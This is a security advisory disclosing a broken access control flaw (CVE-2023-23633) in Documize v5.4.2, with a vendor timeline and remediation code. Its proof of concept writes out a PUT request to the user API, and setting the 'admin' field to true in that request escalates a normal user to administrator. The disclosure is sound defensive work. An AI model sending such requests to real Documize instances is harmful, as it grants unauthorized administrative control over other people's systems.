usd-2022-0065 | Documize v5.4.2 (221021105923) - Broken Access Control

Advisory ID: usd-2022-0065
Product: Documize
Affected Version: v5.4.2 (221021105923)
Vulnerability Type: Broken Access Control (CWE-284)
Security Risk: Critical
Vendor URL: https://www.documize.com
Vendor Status: Not fixed
CVE number: CVE-2023-23633

Description

A broken access control vulnerability was found in Documize, which allows a user to grant themselves admin permissions.

Proof of Concept

The following request was sent to update a user's profile.

PUT /api/users/cee5ocin9t3sjau0153g HTTP/1.1
Host: localhost:5001
Content-Length: 698
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: json
authorization: ey[REDACTED]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.99 Safari/537.36
[...]

{"firstname":"jane","lastname":"doe","email":"janedoe@example.com","initials":"JD","active":true,"editor":true,"admin":false,"viewUsers":true,"analytics":false,"global":false,"accounts":[{"id":"cee5ocin9t3sjau01540","created":"2022-12-15T19:53:22.974178Z","revised":"2022-12-15T19:59:07.184606Z","admin":false,"editor":true,"viewUsers":true,"analytics":false,"userId":"cee5ocin9t3sjau0153g","orgId":"cee5o0qn9t3sjau010c0","company":"Test","title":"Test","message":"Documize Community instance contains all our documentation","domain":"","active":true,"theme":""}],"groups":null,"lastVersion":"","theme":"","created":"2022-12-15T19:53:22.973889Z","revised":"2022-12-15T19:59:07.183878Z","locale":""}

Changing the admin keys to true results in higher privileges.

Fix

Do not allow users to edit any fields on their database entry.
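
One way to enforce this on the server, shown as an added example (not Documize's code and not part of the original advisory): the handler starts from the stored record and accepts privilege flags from the request body only when the caller is already an administrator. The `User` type and `ApplyUpdate` function are hypothetical, and letting name and e-mail pass through on a self-update is an assumption of the example.

```go
package main

import (
	"encoding/json"
	"fmt"
)

// User mirrors the top-level keys of the request body in the proof of concept.
// Hypothetical type for this example, not Documize's own model.
type User struct {
	ID        string `json:"id"`
	Firstname string `json:"firstname"`
	Lastname  string `json:"lastname"`
	Email     string `json:"email"`
	Active    bool   `json:"active"`
	Editor    bool   `json:"editor"`
	Admin     bool   `json:"admin"`
	ViewUsers bool   `json:"viewUsers"`
	Analytics bool   `json:"analytics"`
}

// ApplyUpdate merges a client-supplied body into the stored record.
// Privilege flags are read from the body only when the caller is already an
// admin; for everyone else they keep the values held on the server.
func ApplyUpdate(caller, stored User, body []byte) (User, error) {
	var req User
	if err := json.Unmarshal(body, &req); err != nil {
		return stored, fmt.Errorf("invalid body: %w", err)
	}
	if !caller.Admin && caller.ID != stored.ID {
		return stored, fmt.Errorf("caller %s may not edit user %s", caller.ID, stored.ID)
	}
	out := stored // start from the server-side record, never from the request
	out.Firstname, out.Lastname, out.Email = req.Firstname, req.Lastname, req.Email
	if caller.Admin {
		out.Active, out.Editor, out.Admin = req.Active, req.Editor, req.Admin
		out.ViewUsers, out.Analytics = req.ViewUsers, req.Analytics
	}
	return out, nil
}

func main() {
	// Constructed sample: a non-admin user submits a body with "admin":true.
	jane := User{ID: "u1", Firstname: "jane", Active: true, Editor: true, ViewUsers: true}
	body := []byte(`{"firstname":"jane","lastname":"doe","email":"janedoe@example.com","admin":true,"analytics":true}`)
	got, err := ApplyUpdate(jane, jane, body)
	fmt.Println(got.Admin, got.Analytics, err) // privilege flags stay false
}
```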

Timeline

  • 2022-12-16: First contact request via mail
  • 2023-01-09: Second contact request via mail
  • 2023-01-16: Try to contact vendor again
  • 2023-02-02: Try to contact vendor again
  • 2023-12-22: Publish advisory

Credits

This security vulnerability was identified by Christian Pöschl of usd AG.